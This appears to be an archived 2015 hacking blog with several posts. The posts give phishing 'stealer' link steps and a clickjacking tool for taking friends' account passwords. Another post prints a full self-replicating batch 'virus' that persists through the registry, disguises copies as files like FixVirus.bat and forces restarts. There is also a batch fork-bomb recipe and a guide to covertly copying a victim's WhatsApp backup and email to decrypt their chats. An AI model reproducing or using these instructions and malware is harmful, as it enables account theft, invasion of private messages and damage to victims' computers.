Pages

Sunday, 31 May 2015

Send links and hack their account passwords


As we know hacking account is a little bit hectic, so you can do this trick. It's easy and working

Step 1; Go to http://www.stealer.ambesty.com / and enter your email.

Step 2; Copy the link and put it under a free .tk domain. (http://www.dot.tk/)

Step 3; Send link to your enemy and obtain their passwords!

Note:-  If you get an error message on the next page after entering the email, then update your .NET Framework to 4.4 or higher.

Hacking using Click-Jacking Tool

 A click jacked page tricks a user into performing undesired actions by clicking on a concealed link. On a click jacked page, the attackers load another page over it in a transparent layer. The users think that they are clicking visible buttons, while they are actually performing actions on the hidden page. The hidden page may be an authentic page; therefore, the attackers can trick users into performing actions which the users never intended. There is no way of tracing such actions to the attackers later, as the users would have been genuinely authenticated on the hidden page.


Just few step to start click-jacking hacking using click-jacking tool
Send to your friends and hack their account like facebook, gmail, yahoo and all

Step :1
 (Link 1)
 Click-Jacking Tool (Trick is only for this version of click jacking)

Step :2
Follow the screen instruction  to start click jacking (as show in above picture)

Enjoy ...


Friday, 29 May 2015

How to Shutdown a Computer Using Notepad

This article will show you how to shutdown your computer using a notepad, or we can consider it as a prank virus also so just follow these few simple steps to proceed:


Steps

    1- Open note pad in your computer. you can find it in programs > accessories > notepad.



    2- Type the following code in the notepad- "shutdown -s -t 45". (in the place of 45 you can change it to any digit but it will consider in seconds for e.g 80 it means 1min. 20sec it will take to  shutdown)



    3- Now save the file in anything.bat format.




    4- Run the batch file so formed. you will see a new window which will shutdown the system in 45 seconds.




    5- You can also rectify the shutdown precess by running "shutdown -a" in run dialog box


Thursday, 28 May 2015

Most Deadly Virus For Computer's, Laptops & Tablet's


Just copy and paste the code ( BLUE TEXT ) given below in notepad and save it as anyname.bat (not text) & Be careful

Don't run this on ur pc


@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP


    It will
    1) Copy itself into start-up
    2) Copy itself over one thousand times into random spots in your computer
    3) Hide its self and all other created files
    4) Task kill MSN , Norton, Windows Explorer, Lime wire.
    5) Swap the left mouse button with the right one
    6) Opens alert boxes
    7) Changes the time to 12:00 and shuts down the computer 

Wednesday, 27 May 2015

Computer killing virus - A batch File virus


google_protectAndRun("ads_core.google_render_ad", google_handleError, google_render_ad);

I’ve tried this on windows XP and it seems to kill the computer and it forces the computer to blue screen then reset.

[I've yet to text on vista] This is what I did….

1. Opened up notepad and typed start important.batstart important1.batclose;

2. Clicked save as and saved it as important.bat

3. Clicked save as again and saved it as important1.bat

4. When you click on either 1 of the bats it will spam CMD windows thus killing you memory and forcing it to blue screen and resetyou can rename ‘important.bat’ and ‘important1.bat’ anything you want but make sure it’sstart [bat name file].batstart [bat name file].batclose;

Monday, 25 May 2015

Learn How to Hack Computer and network's

A Complete Guide of Backtrack 5 Penetration

BackTrack was a Linux distribution that focused on security based on the Ubuntu Linux distribution aimed at digital forensics and penetration testing use. In March 2013, the Offensive Security team rebuilt BackTrack around the Debian distribution and released it under the name Kali Linux.

Complete Guide of Backtrack 5 Penetration :- Download

Backtrack - 5 Tutorial for hacking

BACKTRACK - 5

The BackTrack distribution originated from the merger of two formerly competing distributions which focused on penetration testing:
  • WHAX: a Slax-based Linux distribution developed by Mati Aharoni, a security consultant. Earlier versions of WHAX were called Whoppix and were based on Knoppix.
  • Auditor Security Collection: a Live CD based on Knoppix developed by Max Moser which included over 300 tools organized in a user-friendly hierarchy.



HERE ARE THE TUTORIAL'S

TUTORIAL 1 - DOWNLOAD
TUTORIAL 2 - DOWNLOAD
TUTORIAL 3 - DOWNLOAD
TUTORIAL 4 - DOWNLOAD

How To Trace Facebook User

open start -> select run -> type CMD
  • Now chat with your friend
  • and in CMD write NETSTAT 
  • and it will show all the IP address connected with your IP address.
  • To do so we will be using IP tracer service. Go to the below address and paste the IP address in the box that says “lookup this ip or website”. and it will show you the location of the user.

                                                                       CLICK HERE

    It will show you all the information about that user along with his ISP and a Location in the MAP. Now in the MAP Just click on “click for big ip address location” in the big picture you can actually zoom in. and try to recognize the area. If any serious matter just note down the ISP details in that page and contact them about the IP. they will respond you.

    Other netstat commands:
    -a 
    Displays all connections and listening ports.
    -e
     Displays Ethernet statistics. This may be combined with the -s option.
    -n 
    Displays addresses and port numbers in numerical form.
    -p
     proto Shows connections for the protocol specified by proto; proto may be TCP or UDP.
    -s 
    option to display per-protocol statistics, proto may be TCP, UDP, or IP.
    -r
     Displays the routing table.
    -s 
    Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the
    -p
     option may be used to specify a subset of the default.
    That's it.

Sunday, 24 May 2015

I-Phone Hidden setting's are revealed

Follow the list of latest Apple codes list: 


Code                                        Action 
*#06#                             To display the IMEI Number of the mobile  
*225#                              Use to display the balance detail of postpaid number    
*#43#                                   Use to verify if call waiting is enabled
*#61#                                   Verify the number for unanswered calls
*#62#                                   Verify the number for call forwarding if no service is available.
*#67#                                   Verify the number for call forwarding if phone is busy
*#646#                            Use to display the minute detail of postpaid number
*777#                                       Use to display the balance detail of prepaid number    
*3001#12345#*                      Display the iPhone inner settings
*#33#                                    To verify whether barring is enabled or disabled for outgoing

*#21#                                     To display the settings for your call forwarding

How To Hack WhatsApp Account

Steps to follow:
1 - First of all you need to have the device at hand, use the Social Engineering and be quick in getting the e-mail       and backup files msgstore-2014-05-02.1.db.crypt5.  To get the email for this follow the procedures below.
Enter the Play Store and view the e-mail, or write down mentalize somewhere without the person noticing.

Now Go to the device settings from Settings -Accounts & Sync, look for the email from Google and mentalize or write down somewhere without the person noticing.

2 - Now let's take the msgstore-2014-05-08.1.db.crypt7 file To do this, use Polaris Office or any other app that allows you to navigate between folders and manage files.

Follow this path: My files -> WhatsApp -> Databases - In this directory you will find all the backup files of your messenger. 
When you do find the file sharing for your mobile phone via bluetooth.
3 - Have we got the e-mail and file backup http://whatcrypt.com/?cmd=_decrypt 
we enter the site and send the backup file. 

To Submit follows: 
Account: Enter the email of the victim 
Database: Select the database backup 
Click Process / download zip 
Save the zip file on your desktop

4 - Once you have downloaded the backup file in zip format we now need to download the tool to extract the backup and we have access to conversations. Save on the desktop.
WhatsApp Decrypt Adfly: http://adf.ly/1HjlH6


5 - From the desktop to extract the file WhatsApp Decrypt.zip install python-3.4.0 folder and enter the WhatsApp. Browse by: WhatsApp -> Whatsapp_Xtract_V2.1_2012-05-10-2

When you install python-3.4.0 do the following steps:


1 - Go to My Computer, click with the right mouse button and Properties -> Advanced System Settings

2 - In the System Properties navigate to the Advanced tab -> Environment Variables

3 - Environment Variables look for Path

4 - Edit the PATH

5 - At the end of PATH add ;C:\Python34
6 - Click ok and close
6 - Now extract the file from step 3 msgstore_decrypted on the desktop, copy and paste it on WhatsApp folder -> Whatsapp_Xtract_V2.1_2012-05-10-2 and replace the file

7 - Replace the WhatsApp folder -> Whatsapp_Xtract_V2.1_2012-05-10-2 from step 5 and 
look for msgstore.dll file, drag it onto the whatsapp_xtract_drag'n'drop_database file (s) _here



After you drag it will create a file called msgstore.db.html the folder and ask you to press any key at the command prompt to continue ... 
Pressing any key it will open in your default browser displaying the file msgstore.db.html all conversations, dates, numbers, etc...


NoteIn step 2 print shows the crypt 7 but the crypt is correct 5!